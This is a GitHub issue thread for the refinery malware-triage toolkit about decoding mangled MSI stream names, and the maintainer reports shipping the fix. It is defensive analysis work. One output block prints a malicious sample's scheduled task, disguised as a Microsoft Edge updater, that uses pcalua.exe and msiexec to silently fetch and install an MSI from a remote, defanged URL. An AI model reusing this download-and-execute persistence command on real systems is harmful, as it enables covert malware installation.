binref / refinery

High Octane Triage Analysis

MSI Extraction #33

Closed glesnewichpfpt closed 1 year ago

glesnewichpfpt commented 1 year ago

Specification

MSI files are already parsed well using the xtdoc unit. However, the embedded streams are often incorrectly labeled with nonsensical Chinese characters

Example (from https://bazaar.abuse.ch/sample/a00ae529a1ce4e2eb7f988ed5adaa07e653de3fe0c01bec9452aae71b935f63c/)

$ emit Projects/Malware/AdobePDFReader.msi | xtdoc -l 
[5]SummaryInformation
㡿㪆㦍㪄㫊㮅㨁㠀㬇㫄㩅㮌㣍㠍㥁㧆䠋
䡀㬿䏲䐸䖱
䡀㼿䕷䑬㭪䗤䠤
䡀㼿䕷䑬㹪䒲䠯
䡀㽿䅤䈯䠶
䡀㿿䏤䇬䗤䒬䠱
䡀䇊䌰㮱䈻䘦䈷䈜䘴䑨䈦
䡀䇊䗹䛎䆨䗸㼨䔨䈸䆱䠨
䡀䈏䗤䕸㬨䐲䒳䈱䗱䠶
䡀䈏䗤䕸䠨
䡀䈖䌧䠤
䡀䌍䈵䗦䕲䠼
䡀䌏䈯
䡀䑒䗶䏤㮯䈻䘦䈷䈜䘴䑨䈦
䡀䒌䓰䑲䑨䠷
䡀䒖䘧䈯䌜䑪䗤䕸䠨
䡀䕙䓲䕨䜷
䡀䘌䗶䐲䆊䌷䑲

Didier Stevens wrote a plugin for oledump (https://github.com/DidierStevens/DidierStevensSuite/blob/master/plugin_msi_info.py ) that handles this issue & properly displays the correct embedded names. The cleaned-up stream names make it much easier to discern what the MSI will drop, and easier to select which stream to examine next or dump out.

I don't know if it's worth introducing a new unit (like xtmsi) or just building that encoding fix into xtdoc and using it as a flag inside of the unit :)

Streams:
  1        620 SummaryInformation
  2        360 MPB_ExternalFiles.RunAction1_File1
  3     182784 MPB_ExternalFiles.RunAction2_File2
  4    2609864 Binary.CustomActionsModuleX64
  5        728 !_Columns
  6         36 !MPB_RunActions
  7         24 !MPB_ExternalFiles
  8      12676 !_StringData
  9       1756 !_StringPool
 10         40 !_Tables
 11       2232 !_Validation
 12        420 !ActionText
 13         48 !AdminExecuteSequence
 14         24 !AdminUISequence
 15         42 !AdvtExecuteSequence
 16          4 !FeatureComponents
 17         16 !Feature
 18          4 !Binary
 19         12 !Directory
 20        144 !InstallExecuteSequence
 21         72 !InstallUISequence
 22         12 !Component
 23         16 !Upgrade
 24         96 !Error
 25         48 !Property
 26        156 !CustomAction

Test Cases

Second comparison (truncated)

$ emit f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb.bin | xtdoc -l
[5]SummaryInformation
䌋䄱䜵㷾䚨
䌋䄱䜵㹾䚲䕨䋜䏨㼯䕦䓬㵷䘤䆱䈫䞵䏧䠯
䌋䄱䜵㾾䠳
䌋䄱䜵䄾䆬䖸䄷䗦䇾䏯
䌋䄱䜵䄾䖬䋦䇨䏸䕨䇾䏯
䌋䄱䜵䄾䖬䋦䇨䏸䕨䞂䏧䠯
䌋䄱䜵䅾䑤䈱䠵
䌋䄱䜵䆾䇰䌯䎱䕤䒵䠺
䌋䄱䜵䆾䐲䏳䗨䠬
䌋䄱䜵䆾䖸䌷䒦䠱
䌋䄱䜵䇾䄬䒯䠪
䌋䄱䜵䈾䆻䄯䌰䠦
䌋䄱䜵䌾䉱䠲
䌋䄱䜵䌾䖱䌷䒦䠱
䌋䄱䜵䕾䐨䙲䆬䠲
䌋䄱䜵䕾䓨䌤䌵䠦
䌋䄱䜵䗾䅤䄥䎦
䡀㬿䏲䐸䖱
䡀㲊㼿䋦䇨䏸䇨䄝䎶䠶
䡀㲞䈝䗻
䡀㼿䕷䑬㭪䗤䠤
䡀㼿䕷䑬㹪䒲䠯
䡀㽿䅤䈯䠶
䡀㿿䏤䇬䗤䒬䠱
䡀䄕䑸䋦䒌䇱䗬䒬䠱
䡀䄛䌧㫲䗸䒷䠱
䡀䆊䌷䑲䈝䗻
䡀䇊䌰㮱䈻䘦䈷䈜䘴䑨䈦
䡀䇊䌰㾱㼒䔨䈸䆱䠨
䡀䇊䗹䛎䆨䗸㼨䔨䈸䆱䠨
䡀䈏䗤䕸㬨䐲䒳䈱䗱䠶
䡀䈏䗤䕸䠨
䡀䈛䌪䗶䜵
䡀䈝䗻䗜䏼䠨
䡀䋌䆨㫮䛲
䡀䌋䄱䜵
䡀䌍䈵䗦䕲䠼
䡀䌍䏤䊲
䡀䑒䗶䏤㮯䈻䘦䈷䈜䘴䑨䈦
䡀䑒䗶䏤㾯㼒䔨䈸䆱䠨
䡀䒋䗲䗶䄵䓳䕨㲞䈜䘴䑨䈦
䡀䒌䓰䑲䑨䠷
䡀䒌䗱䒵㬯䑲䌧䌷䑲
䡀䒌䗱䒵㮯䈹䗱
䡀䒌䗱䒵䠯
䡀䓞䕪䇤䠨
䡀䕌䄨䈷䒏䇯䕨
䡀䕎䒵䠵
䡀䕙䓲䕨䜷
䡀䘌䗶䐲䆊䌷䑲
䡀䙎䑨㶷䓤䌳䊱

$ python3 oledump.py -p plugin_msi_info.py f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb.bin

Streams:
  1        316 SummaryInformation
  2        318 Binary.New
  3     627864 Binary.PowerShellScriptLauncher.dll
  4        318 Binary.Up
  5     390304 Binary.aicustact.dll
  6     146072 Binary.aischeduler.dll
  7     183448 Binary.aischeduler2.dll
  8       2818 Binary.banner
  9       2862 Binary.cmdlinkarrow
 10       2998 Binary.completi
 11       2998 Binary.custicon
 12      11791 Binary.dialog
 13        766 Binary.exclamic
 14       1078 Binary.info
 15       2998 Binary.insticon
 16       2998 Binary.removico
 17       2998 Binary.repairic
 18        854 Binary.tabback
 19       1480 !_Columns
 20         32 !AI_ScheduledTasks
 21        444 !UIText
 22      84211 !_StringData
 23       7560 !_StringPool
 24         76 !_Tables
 25       4440 !_Validation
 26         16 !LaunchCondition
 27         36 !RadioButton
 28        480 !ActionText
 29         48 !AdminExecuteSequence
 30         66 !AdminUISequence
 31         72 !AdvtExecuteSequence
 32          8 !FeatureComponents
 33         16 !Feature
 34         24 !Registry
 35         48 !TextStyle
 36         12 !CheckBox
 37         68 !Binary
 38         12 !Directory
 39        616 !Dialog
 40        462 !InstallExecuteSequence
 41        180 !InstallUISequence
 42         54 !BootstrapperUISequence
 43         24 !Component
 44         72 !ControlCondition
 45       1536 !ControlEvent
 46       7280 !Control
 47         32 !Upgrade
 48          4 !CreateFolder
 49       2564 !Error
 50        332 !Property
 51        372 !CustomAction
 52        128 !EventMapping
jhhcs commented 1 year ago

Oh this has been bugging me for so long 😅! I didn't know the Master of Maldocs had a script for this, although that is obviously no surprise. Excellent suggestion, I'll get on it. My feeling is that you'd really just want xtdoc to automatically display the "correct" file names, I'll see if I can just make it work automatically, even without an additional flag.

jhhcs commented 1 year ago

This has been added and will be in the next release. The unit xtdoc will now demangle MSI names, but it will still extract all the streams raw. I added a separate unit called xtmsi which combines all the stream information in a single, synthesized JSON document that is available as one of the extracted items. For your second example, this looks as follows.

Here is the directory listing:

[19:01] emit f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb | xt -l
Action/AI_DATA_SETTER
Binary/New
Binary/PowerShellScriptLauncher.dll
Binary/Up
Binary/aicustact.dll
Binary/aischeduler.dll
Binary/aischeduler2.dll
Binary/banner
Binary/cmdlinkarrow
Binary/completi
Binary/custicon
Binary/dialog
Binary/exclamic
Binary/info
Binary/insticon
Binary/removico
Binary/repairic
Binary/tabback
MsiTables.json

And here is an example of isolating the (likely?) malicious logic in the AI_ScheduledTasks table:

[19:01] emit f0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb | xt MsiTables.json | xtjson AI_ScheduledTasks.#0 | defang
{
    "TaskId": "MicrosoftEdgeUpdateTaskMachine",
    "TaskName": "Microsoft Edge Update Task Machine",
    "Run": "c:\\windows\\system32\\pcalua.exe",
    "CmdLine": "-a msiexec -c /Q /i https[:]//www.thecloudnet[.]org/%username%.msi",
    "WorkDir": "c:\\windows\\system32",
    "User": "",
    "Pass": "",
    "UserProp": "[%UserDomain]\\[LogonUser]",
    "PassProp": "",
    "StartTime": "0",
    "Comments": "",
    "Flags": 8192,
    "Trigger": "1|300|1|1|0|1|0|",
    "Condition": "1",
    "TaskVersion": "2.0"
}

For your first example, I get a slightly different listing than the one you posted:

[19:07] emit a00ae529a1ce4e2eb7f988ed5adaa07e653de3fe0c01bec9452aae71b935f63c | xt -l
MsiTables.json
_16AD64AAB5E18007C4B59CED3D01567B

[19:07] emit a00ae529a1ce4e2eb7f988ed5adaa07e653de3fe0c01bec9452aae71b935f63c | xtdoc -l
[5]SummaryInformation
_16AD64AAB5E18007C4B59CED3D01567B
!_Columns
!_StringData
!_StringPool
!_Tables
!_Validation
!AdminExecuteSequence
!AdvtExecuteSequence
!FeatureComponents
!Feature
!Media
!Directory
!File
!InstallExecuteSequence
!Component
!ModuleSignature
!Property
!CustomAction

However, I get the same listing from 7zip, so I am thinking it's probably correct.

jhhcs commented 1 year ago

Ah, right, I was using xt in the examples above: xt will default to xtmsi when executed on MSIs.

jhhcs commented 1 year ago

Alright, 0.6.4 is deploying; I am closing this out as completed. I added a test and I think all is well, but let me know if it is giving you any trouble.